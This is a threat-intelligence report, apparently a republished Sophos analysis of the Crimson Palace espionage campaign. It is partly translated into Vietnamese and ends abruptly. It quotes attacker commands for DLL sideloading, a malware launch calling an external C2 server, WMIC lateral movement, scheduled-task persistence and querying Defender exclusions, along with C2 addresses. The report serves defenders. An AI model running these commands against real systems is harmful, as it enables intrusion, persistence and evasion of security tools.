{"id":20428,"date":"2024-09-18T16:25:02","date_gmt":"2024-09-18T09:25:02","guid":{"rendered":"https:\/\/thegioifirewall.com\/?p=20409"},"modified":"2025-03-24T07:27:22","modified_gmt":"2025-03-24T07:27:22","slug":"crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi","status":"publish","type":"post","link":"https:\/\/vacif.com\/en\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi\/","title":{"rendered":"CRIMSON PALACE RETURNS: NEW TOOLS, TACTICS AND TARGETS"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-1024x683.png\" alt=\"\" class=\"wp-image-20417\"\/><\/figure>\n\n\n\n<p>A Chinese cyberespionage campaign continues its efforts across multiple organizations in Southeast Asia, combining tactics and expanding its reach<\/p>\n\n\n\n<p>Written by <a href=\"https:\/\/news.sophos.com\/en-us\/author\/mark-parsons\/\">Mark Parsons<\/a>, <a href=\"https:\/\/news.sophos.com\/en-us\/author\/morgan-demboski\/\">Morgan Demboski<\/a>, <a href=\"https:\/\/news.sophos.com\/en-us\/author\/sean-gallagher\/\">Sean Gallagher<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/09\/10\/crimson-palace-new-tools-tactics-targets\/\">September 10, 2024<\/a><\/p>\n\n\n\n<p>After a brief pause in activity, Sophos X-Ops continues to track and respond to what we assess with high confidence to be a Chinese state-directed cyberespionage operation targeting a key agency in the government of a Southeast Asian nation.<\/p>\n\n\n\n<p>While investigating that activity, which we track as Operation Crimson Palace, Sophos Managed Detection and Response (MDR) found telemetry indicating the compromise of other government organizations in the region, and detected related activity from these existing threat clusters in other organizations in the same region. The attackers have consistently used the compromised networks of other public-service organizations and entities in that region to distribute malware and tools under the guise of a trusted access point.<\/p>\n\n\n\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-sophos-threat-hunting-unveils-multiple-clusters-of-chinese-state-sponsored-activity-targeting-southeast-asia\/\">Our previous report<\/a> covered activity from three related security threat activity clusters (STACs) tied to the cyberespionage operation: Cluster Alpha (STAC1248), Cluster Bravo (STAC1870) and Cluster Charlie (STAC1305), all of which were detected between March and August 2023. All three threat clusters operating inside the targeted agency ceased activity in August 2023.<\/p>\n\n\n\n<p>However, Cluster Charlie resumed activity a few weeks later. That activity, which included a previously undocumented keylogger we named \u201cTattleTale\u201d, marked the beginning of a second and expanded phase of intrusion activity across the region, which is still ongoing.<\/p>\n\n\n\n<p>Sophos MDR also observed a series of detections consistent with the tooling used by Cluster Bravo at entities outside the government agency described in our initial report, including two non-governmental public-service organizations and several other organizations, all based in the same region. Those detections included telemetry showing one organization's systems being used as a C2 relay and a tool staging point, as well as malware being staged on another organization's compromised Microsoft Exchange server.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-1.png\" alt=\"\" class=\"wp-image-20412\"\/><figcaption class=\"wp-element-caption\"><em>Figure 1. The three security threat activity clusters observed in the first phase of Operation Crimson Palace and their overlaps with previously reported threat actors and with each other, March to August 2023<\/em><\/figcaption><\/figure>\n\n\n\n<p><strong>Cluster Bravo, expanded<\/strong><\/p>\n\n\n\n<p>While Cluster Bravo was only briefly active on the network of the organization described in our first report, Sophos X-Ops subsequently detected Cluster Bravo-related activity on the networks of at least 11 other organizations and agencies in the same region. In addition, Sophos identified multiple organizations whose infrastructure was used to stage malware, including one government agency. The threat actors were precise in how they leveraged these compromised environments for staging, always making sure to use an infected organization in the same vertical for their attacks.<\/p>\n\n\n\n<p>This new activity spanned January to June 2024 and included two private organizations with government-related roles. The affected organizations represent a range of critical functions of the targeted government.<\/p>\n\n\n\n<p><strong>Cluster Charlie, renewed<\/strong><\/p>\n\n\n\n<p>Cluster Charlie went quiet in August 2023 after Sophos blocked <a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#c-c2\">its custom C2 implants (PocoProxy)<\/a>. However, the actors behind the intrusion eventually returned with new techniques in late September.<\/p>\n\n\n\n<p>This began with attempts to evade the blocks by switching to different C2 channels and with the Cluster Charlie actor changing how it deployed implants. Those changes included, as we noted in the previous report, the use of a custom malware loader called <a href=\"https:\/\/www.sentinelone.com\/labs\/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector\/\">HUI loader<\/a> (identified by Sentinel Labs) to inject a Cobalt Strike beacon into the Remote Desktop utility mstsc.exe.<\/p>\n\n\n\n<p>In September, however, the attackers behind Cluster Charlie changed their operations in several ways:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>They used open-source and off-the-shelf tools to re-establish their presence after Sophos detected and blocked their custom tools.<\/li>\n\n\n\n<li>They leveraged a number of tools and techniques that had been part of the other threat activity clusters we observed.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-2-1024x539.png\" alt=\"\" class=\"wp-image-20413\"\/><figcaption class=\"wp-element-caption\"><em>Figure 2: Cluster Charlie-related activity resumed in September 2023 after being disrupted in August<\/em><\/figcaption><\/figure>\n\n\n\n<p>Exfiltration of data of intelligence value remained the objective after activity resumed. However, much of their effort appeared to focus on re-establishing and expanding their foothold on the target network by bypassing EDR software and quickly re-establishing access whenever their C2 implants were blocked.<\/p>\n\n\n\n<p><strong>September 2023 onward: Web shells and open-source tools<\/strong><\/p>\n\n\n\n<p>With their C2 tooling blocked by Sophos, the attackers adopted a new approach. Using previously stolen credentials, the attackers deployed a web shell to a web application server via its built-in file-upload feature. The attacker conducted a methodical survey of the web application server's configuration files and virtual directories to locate the web application's DLL. They then used the web shell to execute commands on the targeted web application server. This included copying the application's dynamic link library (DLL) into a web document directory and disguising it as a PDF so that it could be retrieved through the application, using the credentials previously linked to Cluster Charlie activity.<\/p>\n\n\n\n<p>All of this reconnaissance and collection took place in an extremely short window: under 45 minutes.<\/p>\n\n\n\n<p>They returned to the compromised web application server in November, using the web shell to deploy the open-source Havoc C2 framework in support of reconnaissance activity. That server went offline shortly afterward and we were unable to collect further telemetry on the attackers' activity. However, Sophos MDR subsequently found the same web application being exploited on other servers. Over the following months, the Cluster Charlie threat actor would regularly deploy web shells on other servers across the target network before downloading Havoc payloads.<\/p>\n\n\n\n<p>For example, in November, the attackers used the Havoc tool to inject code into other processes, then deployed the open-source SharpHound tool to map the Active Directory infrastructure.<\/p>\n\n\n\n<p>This activity shows the continued interest of the actors behind Cluster Charlie in mapping the topography of the environment's infrastructure from multiple angles. In June 2023, <a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#cluster-charlie\">Cluster Charlie performed an in-depth capture<\/a> of the target organization's successful logon events (event ID 4624) via PowerShell commands. They went on to ping-sweep the IP addresses associated with the locations of those successful logons, mapping the organization's users to the network's IP address space. The use of SharpHound would provide further knowledge of the organization's structure, including details of the domain permissions assigned to those mapped users.<\/p>\n\n\n\n<p>During this second phase of activity, we continued to see the threat actors pivot to open-source tools whenever their own tooling for C2 or MDR evasion failed. The off-the-shelf and open-source tools included:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>Tool<\/td><td>Application<\/td><td>Timeframe<\/td><\/tr><tr><td><a href=\"https:\/\/www.cobaltstrike.com\/\">Cobalt Strike<\/a><\/td><td>C2<\/td><td>Aug.-Sep. 2023; Dec. 2023; Feb.-Mar. 2024<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/HavocFramework\/Havoc\">Havoc<\/a><\/td><td>C2<\/td><td>Sep. 2023 \u2013 Jun. 2024<\/td><\/tr><tr><td>Atexec<\/td><td>C2\/ Lateral Movement<\/td><td>Oct.-Nov. 2023<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/BloodHoundAD\/SharpHound\">SharpHound<\/a><\/td><td>Reconnaissance<\/td><td>Nov. 2023<\/td><\/tr><tr><td>Impacket<\/td><td>Lateral movement<\/td><td>Apr. 2024<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/TheWover\/donut\">Donut<\/a><\/td><td>Shellcode loader<\/td><td>Feb.-Mar. 2024<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/INotGreen\/XieBroC2\">XieBroC2<\/a><\/td><td>C2<\/td><td>Feb. 2024<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/weak1337\/Alcatraz\">Alcatraz<\/a><\/td><td>EDR Evasion<\/td><td>Feb.-Jun. 2024<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/cloudflare\/cloudflared\">Cloudflared tunnel<\/a><\/td><td>C2<\/td><td>Jun. 2024<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/myzxcg\/RealBlindingEDR\">RealBlindingEDR<\/a><\/td><td>EDR Evasion<\/td><td>Jan.-Mar. 2024<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/florylsk\/ExecIT\">ExecIT<\/a><\/td><td>Shellcode loader<\/td><td>Mar. 2024<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><strong>October and November 2023: Cross-pollination of tactics<\/strong><\/p>\n\n\n\n<p>As in our previous observations, the actors behind this new wave of activity relied heavily on DLL sideloading, using malicious dynamic link libraries with function names matching those used by legitimate, signed executables and placing them in a directory where they would be found and loaded by those executables. We also saw these actors use tactics we had previously observed as part of other threat activity clusters, reinforcing our assessment that all of the earlier activity was orchestrated by the same overarching organization.<\/p>\n\n\n\n<p>In October, Cluster Charlie was observed deploying additional C2 tooling by using DLL hijacking to abuse legitimate software downloaded by the operator, creating a vulnerable executable that they could use. The attackers used credentials obtained from an unmanaged device, then used that unmanaged device to launch a remote attack on a target system with the Impacket atexec module, a tactic used as part of the Cluster Alpha activity we observed in the activity <a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-lateral\">described in our previous report<\/a>.<\/p>\n\n\n\n<p>The atexec module was used to remotely configure a scheduled task on the target system. That task executed Trend Micro's Platinum Watch Dog (ptWatchDog.exe) with a malicious sideloaded version of the tool's DLL, tmpblglog.dll; this was used to ping an IP address hosted by a domestic telecommunications company. Because atexec was run from an unmanaged device, we could only identify it through telemetry and were unable to collect any samples.<\/p>\n\n\n\n<p>A week later, Sophos observed the actor connecting to the same IP address at the telecommunications company from a different device on the victim's network, using an alternate DLL sideloading combination. In this case, the attacker deployed a copy of a valid Windows .NET framework component, mscorsvw.exe, placed in the C:\\Windows\\Help\\Help directory, to sideload a malicious payload (mscorsvc.dll) and create a network connection to the same telecommunications company on TCP port 443.<\/p>\n\n\n\n<p>During these network connections, Sophos observed the creation of a new machine authentication key. This indicates that the threat actor attempted to RDP from a device outside the target organization's environment. Investigating the remote IP via the vulnerability search engine <a href=\"https:\/\/www.shodan.io\/dashboard\">Shodan<\/a> found an open RDP server user-authentication screen on that remote device. The attackers have consistently used other compromised networks in the organization's region to move laterally within the network.<\/p>\n\n\n\n<p>On November 3, Sophos MDR again observed the actors using atexec from an unmanaged device on the network to execute a malicious file (C:\\ProgramData\\mios.exe) on a target system, generating both internal and external communications:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Internal communication: C:\\Windows\\system32\\cmd.exe \/C \u201cc:\\programdata\\mios.exe 172.xx.xxx.xx 65211\u201d<\/li>\n\n\n\n<li>External communication: c:\\programdata\\mios.exe 178.128.221.202 443 (Digital Ocean, Singapore)<\/li>\n<\/ul>\n\n\n\n<p>Sophos was unable to obtain a sample of this malicious executable.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-3-1024x857.png\" alt=\"\" class=\"wp-image-20414\"\/><figcaption class=\"wp-element-caption\"><em>Figure 3: Flow map of the attack chain used by the attacker in the second intrusion phase (click to enlarge)<\/em><\/figcaption><\/figure>\n\n\n\n<p><strong>November and December 2023, part 1: Service hijacking<\/strong><\/p>\n\n\n\n<p>Also in November, we observed the threat actor searching for a number of services that they could exploit for DLL sideloading, and then hijacking the DLLs of existing services to establish a custom backdoor. Their first step was to use Microsoft's Service Control utility (sc.exe) to gather information on services they could use to host a malicious DLL:<\/p>\n\n\n\n<p>sc query diagtrack<\/p>\n\n\n\n<p>sc query appmgmt<\/p>\n\n\n\n<p>sc query AxInstSV<\/p>\n\n\n\n<p>sc query swprv<\/p>\n\n\n\n<p>In this case, the actor then replaced the legitimate Volume Shadow Copy Service DLL (C:\\System32\\swprv.dll) with their own malicious payload, further obscuring their deployment. They did this by using a compromised administrative account to modify the permissions on the existing DLL from File Explorer, before moving their own (malicious) copy into the \\System32 directory.<\/p>\n\n\n\n<p>Sophos MDR had <a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#prior-compromise\">observed similar activity in December 2022<\/a> during an earlier compromise of this agency, discovered when Sophos endpoint protection was first deployed on the agency's network. Artifacts of that activity showed that the attacker had leveraged DLL sideloading to create two large DLLs (swprvs.dll and appmgmt.dll).<\/p>\n\n\n\n<p>When the Shadow Copy Service was executed from svchost.exe, the malicious swprv.dll was observed making multiple DNS requests and network connections to the following domains and IP addresses:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>103.19.16.248:443 \/\/ dmsz.org (located in the Philippines)<\/li>\n\n\n\n<li>103.56.5.224:443 \/\/ cancelle.net (geolocated in the Philippines)<\/li>\n\n\n\n<li>49.157.28.114:443 \/\/ gandeste.net (located in the Philippines)<\/li>\n<\/ul>\n\n\n\n<p>In December, the actors used this sideloading technique to run malware that communicated with the IP address 123.253.35.100 (geolocated in Malaysia), via the Internet Explorer browser process iexplore.exe. According to analysis by SophosLabs, the DLL was designed to change firewall proxy settings and was observed spawning a command shell to complete its discovery. The DLL contained a suspicious string that appears to reveal a file path on the malware author's development machine (E:\\Masol_https190228\\x64\\Release\\Masol.pdb).<\/p>\n\n\n\n<p>In an example of similar but distinct attacks, while both Cluster Charlie and Cluster Alpha chose to deploy some of their payloads using Service DLL sideloading, the service Cluster Charlie targeted, the Volume Shadow Copy Service, used the same root permissions that Cluster Alpha had added to the IKEEXT (IKE and AuthIP IPsec Keying Modules) service in June 2023, as described in our <a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-persistence\">Technical Deep Dive Part 1<\/a>.<\/p>\n\n\n\n<p><strong>November and December 2023, part 2: Evasive action, EDR evasion and deeper reconnaissance<\/strong><\/p>\n\n\n\n<p>In mid-November, the same web application server that had been attacked in September was compromised again, with the threat actor using credentials stolen from an unmanaged device and a dropped web shell. The attackers used the shell to execute rundll32.exe, injecting a malicious Havoc DLL (with its file extension changed to .pdf) into backgroundtaskhost.exe, a Windows component responsible for running the Windows virtual assistant (Cortana):<\/p>\n\n\n\n<p>rundll32 C:\\inetpub\\wwwroot\\idocs_api\\Temp\\&lt;REDACTED&gt;DOC20231100001603KMAP.pdf,Start<\/p>\n\n\n\n<p>This DLL sent C2 communications to the attacker's C2 server (107.148.41.114, geolocated in the United States).<\/p>\n\n\n\n<p>Next, the attacker ran the following command to check whether an RDP logon had been successful. The attacker was searching the Windows Event Logs for Windows Remote Connection Manager event ID 1149:<\/p>\n\n\n\n<p>\/c wevtutil qe Microsoft-Windows-TerminalServices-RemoteConnectionManager\/Operational \/rd:true \/f:text \/q:*[System[(EventID=1149)]] &gt;&gt; c:\\windows\\temp\\1.txt<\/p>\n\n\n\n<p>This query returns Windows events signaling the successful establishment of a Terminal Services remote connection session. The Havoc DLL then sent a ping back to its C2.<\/p>\n\n\n\n<p>Next, the injected process used WMIC to query Windows Defender's exclusion paths, which would tell them which directories and file types Defender does not scan: in theory, locations that could be used to avoid malware protection.<\/p>\n\n\n\n<p>\/c WMIC \/NAMESPACE:\\\\root\\Microsoft\\Windows\\Defender PATH MSFT_MpPreference get ExclusionPath<\/p>\n\n\n\n<p>It also queried the Sophos registry keys to better understand the \u201cPolicyConfiguration\u201d, \u201cthreat policy\u201d and \u201cPoll Server\u201d registry values, and used cmd.exe to query the status of \u201cSophosHealthClient.exe\u201d. This revealed the security policy configuration for the endpoint, the status of Sophos protection on the device, and the URL that the endpoint protection software polls for configuration changes. 
Khi k\u1ebft th\u00fac truy v\u1ea5n, t\u00e1c nh\u00e2n \u0111e d\u1ecda \u0111\u00e3 s\u1eed d\u1ee5ng l\u1ec7nh sau \u0111\u1ec3 x\u00e1c \u0111\u1ecbnh c\u00e1c lo\u1ea1i tr\u1eeb, m\u1ee5c \u0111\u01b0\u1ee3c ph\u00e9p v\u00e0 m\u1ee5c b\u1ecb ch\u1eb7n trong c\u1ea5u h\u00ecnh:&nbsp;<\/p>\n\n\n\n<p>findstr \/i \/c:exclude \/c:whitelist \/c:blocklist&nbsp;<\/p>\n\n\n\n<p>D\u1eef li\u1ec7u m\u00e1y ch\u1ee7 th\u0103m d\u00f2 c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i nh\u01b0&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-persistence\">EagerBee<\/a>&nbsp;(nh\u01b0 \u0111\u00e3 th\u1ea5y trong&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#cluster-alpha\">ho\u1ea1t \u0111\u1ed9ng Cluster Alpha \u0111\u01b0\u1ee3c ghi l\u1ea1i trong b\u00e1o c\u00e1o g\u1ea7n \u0111\u00e2y nh\u1ea5t c\u1ee7a ch\u00fang t\u00f4i<\/a>&nbsp;) s\u1eed d\u1ee5ng \u0111\u1ec3 ch\u1eb7n d\u1eef li\u1ec7u \u0111o t\u1eeb xa v\u00e0 c\u1eadp nh\u1eadt cho \u0111i\u1ec3m cu\u1ed1i trong t\u01b0\u01a1ng lai, m\u1eb7c d\u00f9 kh\u00f4ng c\u00f3 b\u1eb1ng ch\u1ee9ng n\u00e0o cho th\u1ea5y \u0111i\u1ec1u \u0111\u00f3 x\u1ea3y ra \u1edf \u0111\u00e2y.&nbsp;<\/p>\n\n\n\n<p>C\u0169ng trong th\u00e1ng 11, b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng m\u1ed9t t\u00e0i kho\u1ea3n qu\u1ea3n tr\u1ecb b\u1ecb x\u00e2m ph\u1ea1m, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 s\u1eed d\u1ee5ng phi\u00ean shell l\u1ec7nh \u0111\u01b0\u1ee3c t\u1ea1o ra t\u1eeb DLL \u0111\u1ed9c h\u1ea1i \u0111\u1ec3 di chuy\u1ec3n ngang qua WMIC v\u00e0 tri\u1ec3n khai c\u00f4ng c\u1ee5 SharpHound ngu\u1ed3n m\u1edf d\u01b0\u1edbi d\u1ea1ng DLL \u0111\u1ec3 l\u1eadp b\u1ea3n \u0111\u1ed3 c\u01a1 s\u1edf h\u1ea1 t\u1ea7ng Active Directory.&nbsp;&nbsp;<\/p>\n\n\n\n<p>\/c wmic \/node:172.xx.xxx.xxx\/password:&#8221;&lt;REDACTED&gt;&#8221; 
\/user:&#8221;&lt;REDACTED&gt;&#8221; process call create &#8220;cmd \/c C:\\Windows\\syswow64\\rundll32.exe C:\\windows\\syswow64\\Windows.Data.Devices.Config.dll,Start&#8221;<\/p>\n\n\n\n<p>Sau \u0111\u00f3, k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng th\u00f4ng tin x\u00e1c th\u1ef1c \u0111\u1ec3 truy c\u1eadp v\u00e0o m\u1ed9t trong c\u00e1c ch\u01b0\u01a1ng tr\u00ecnh qu\u1ea3n l\u00fd si\u00eau gi\u00e1m s\u00e1t c\u1ee7a t\u1ed5 ch\u1ee9c v\u00e0 t\u1ea1o m\u1ed9t t\u00e1c v\u1ee5 theo l\u1ecbch tr\u00ecnh, th\u1ef1c thi m\u1ed9t DLL \u0111\u1ed9c h\u1ea1i kh\u00e1c ng\u1ee5y trang th\u00e0nh t\u1ec7p .ini \u0111\u1ec3 k\u1ebft n\u1ed1i v\u1edbi c\u00f9ng m\u1ed9t IP C2 b\u00ean ngo\u00e0i nh\u01b0 IP ng\u1ee5y trang th\u00e0nh t\u1ec7p PDF.&nbsp;<\/p>\n\n\n\n<p>schtasks \/create \/tn \\Microsoft\\Windows\\Clip2 \/tr &#8220;rundll32 C:\\programdata\\vmnat\\Test\\log.ini,Start&#8221; \/ru System \/sc minute \/mo 90 \/f&nbsp;<\/p>\n\n\n\n<p>T\u00e1c v\u1ee5 theo l\u1ecbch tr\u00ecnh n\u00e0y cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng th\u1ef1c hi\u1ec7n m\u1ed9t b\u01b0\u1edbc chuy\u1ec3n kh\u00e1c t\u1eeb tr\u00ecnh qu\u1ea3n l\u00fd \u1ea3o sang h\u1ec7 th\u1ed1ng kh\u00e1c \u0111\u1ec3 th\u1ef1c thi SharpHound, b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng t\u00e0i kho\u1ea3n qu\u1ea3n tr\u1ecb tr\u01b0\u1edbc \u0111\u00f3 \u0111\u01b0\u1ee3c li\u00ean k\u1ebft v\u1edbi Cluster Charlie.&nbsp;&nbsp;<\/p>\n\n\n\n<p>\/c schtasks \/create \/s 172.xx.xxx.xxx \/p &#8220;&lt;REDACTED&gt;&#8221; \/u &#8220;&lt;REDACTED&gt;&#8221; \/tn \\Microsoft\\Windows\\Clip2 \/tr &#8220;C:\\Windows\\syswow64\\rundll32.exe C:\\windows\\syswow64\\Windows.Data.Devices.Config.dll,Start&#8221; \/ru System \/sc minute \/mo 90 \/f&nbsp;<\/p>\n\n\n\n<p><strong>Th\u00e1ng 12 n\u0103m 2023: Thu th\u1eadp v\u00e0 l\u1ecdc&nbsp;<\/strong><\/p>\n\n\n\n<p>V\u00e0o th\u00e1ng 12, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 ti\u1ebfn h\u00e0nh m\u1ed9t lo\u1ea1t c\u00e1c n\u1ed7 l\u1ef1c do 
th\u00e1m v\u00e0 thu th\u1eadp. \u0110i\u1ec1u n\u00e0y bao g\u1ed3m vi\u1ec7c thu th\u1eadp th\u00f4ng tin \u0111\u0103ng nh\u1eadp v\u00e0 d\u1eef li\u1ec7u c\u1ee7a qu\u1ea3n tr\u1ecb vi\u00ean cho nh\u1eefng ng\u01b0\u1eddi d\u00f9ng c\u1ee5 th\u1ec3, c\u0169ng nh\u01b0 ping c\u00e1c t\u00e0i kho\u1ea3n ng\u01b0\u1eddi d\u00f9ng v\u00e0 m\u00e1y m\u00e0 ch\u00fang t\u00f4i quan s\u00e1t th\u1ea5y nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng do th\u00e1m trong&nbsp;&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#c-discovery\">ho\u1ea1t \u0111\u1ed9ng Cluster Charlie tr\u01b0\u1edbc \u0111\u00f3 v\u00e0o th\u00e1ng 6 n\u0103m 2023.<\/a>&nbsp;Trong th\u1eddi gian n\u00e0y, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 ti\u1ebfn h\u00e0nh ho\u1ea1t \u0111\u1ed9ng gi\u00e1n \u0111i\u1ec7p c\u00f3 m\u1ee5c ti\u00eau, trong \u0111\u00f3 ch\u00fang thu th\u1eadp c\u00e1c t\u00e0i li\u1ec7u nh\u1ea1y c\u1ea3m, kh\u00f3a cho c\u01a1 s\u1edf h\u1ea1 t\u1ea7ng \u0111\u00e1m m\u00e2y (bao g\u1ed3m ph\u1ee5c h\u1ed3i sau th\u1ea3m h\u1ecda v\u00e0 sao l\u01b0u), c\u00e1c kh\u00f3a v\u00e0 ch\u1ee9ng ch\u1ec9 x\u00e1c th\u1ef1c quan tr\u1ecdng kh\u00e1c v\u00e0 d\u1eef li\u1ec7u c\u1ea5u h\u00ecnh cho ph\u1ea7n l\u1edbn c\u01a1 s\u1edf h\u1ea1 t\u1ea7ng CNTT v\u00e0 m\u1ea1ng c\u1ee7a c\u01a1 quan.&nbsp;&nbsp;<\/p>\n\n\n\n<p><strong>2024: T\u0103ng t\u1ed1c&nbsp;<\/strong><\/p>\n\n\n\n<p>&nbsp;V\u00e0o n\u0103m 2024, r\u00f5 r\u00e0ng l\u00e0 c\u00e1c t\u00e1c nh\u00e2n \u0111e d\u1ecda \u0111\u00e3 b\u1eaft \u0111\u1ea7u nhanh ch\u00f3ng lu\u00e2n chuy\u1ec3n qua c\u00e1c k\u00eanh C2 \u0111\u1ec3 duy tr\u00ec v\u00e0 qu\u1ea3n l\u00fd quy\u1ec1n truy c\u1eadp li\u00ean t\u1ee5c khi Sophos ph\u00e1t hi\u1ec7n v\u00e0 ch\u1eb7n c\u00e1c c\u1ea5y gh\u00e9p C2 hi\u1ec7n c\u00f3. Ch\u00fang c\u0169ng thay \u0111\u1ed5i c\u00e1ch tri\u1ec3n khai c\u00e1c t\u1ea3i tr\u1ecdng \u0111\u1ed9c h\u1ea1i. 
T\u1eeb th\u00e1ng 11 n\u0103m 2023 \u0111\u1ebfn \u00edt nh\u1ea5t l\u00e0 th\u00e1ng 5 n\u0103m 2024, c\u00e1c t\u00e1c nh\u00e2n trong Cluster Charlie \u0111\u00e3 tri\u1ec3n khai c\u00e1c c\u1ea5y gh\u00e9p C2 b\u1eb1ng 28 t\u1ed5 h\u1ee3p duy nh\u1ea5t c\u1ee7a chu\u1ed7i t\u1ea3i ph\u1ee5, ph\u01b0\u01a1ng ph\u00e1p th\u1ef1c thi v\u00e0 tr\u00ecnh t\u1ea3i shellcode.&nbsp;&nbsp;<\/p>\n\n\n\n<p>C\u00f3 ba l\u00fd do khi\u1ebfn c\u00e1c di\u1ec5n vi\u00ean nhanh ch\u00f3ng lu\u00e2n chuy\u1ec3n k\u00eanh C2 v\u00e0 ph\u01b0\u01a1ng ph\u00e1p tri\u1ec3n khai c\u1ee7a h\u1ecd:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C\u00f3 b\u1eb1ng ch\u1ee9ng cho th\u1ea5y nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111ang th\u1eed nghi\u1ec7m \u0111\u1ec3 xem li\u1ec7u Sophos c\u00f3 ph\u00e1t hi\u1ec7n ra c\u00e1c t\u1ec7p v\u00e0 ph\u01b0\u01a1ng ph\u00e1p tri\u1ec3n khai kh\u00e1c nhau hay kh\u00f4ng.&nbsp;&nbsp;<\/li>\n\n\n\n<li>C\u00e1c k\u00eanh C2 xoay v\u00f2ng nhanh ch\u00f3ng v\u00e0 ph\u01b0\u01a1ng ph\u00e1p tri\u1ec3n khai c\u00f3 th\u1ec3 khi\u1ebfn b\u00ean ph\u00f2ng th\u1ee7 kh\u00f3 theo k\u1ecbp v\u00e0 ng\u0103n ch\u1eb7n h\u01a1n.&nbsp;&nbsp;<\/li>\n\n\n\n<li>Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 ph\u1ea3n h\u1ed3i l\u1ea1i h\u00e0nh \u0111\u1ed9ng ch\u1eb7n c\u1ee7a ch\u00fang t\u00f4i, \u0111\u00f4i khi thi\u1ebft l\u1eadp l\u1ea1i quy\u1ec1n truy c\u1eadp trong v\u00f2ng 24 gi\u1edd v\u00e0 tri\u1ec3n khai m\u1ed9t m\u1eabu duy nh\u1ea5t \u0111\u00e3 \u0111\u01b0\u1ee3c s\u1eeda \u0111\u1ed5i trong v\u00f2ng ch\u01b0a \u0111\u1ea7y b\u1ed1n ng\u00e0y \u0111\u1ec3 tr\u00e1nh b\u1ecb ph\u00e1t hi\u1ec7n ch\u1eb7n.&nbsp;<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-4-1024x577.png\" alt=\"\" class=\"wp-image-20415\"\/><figcaption 
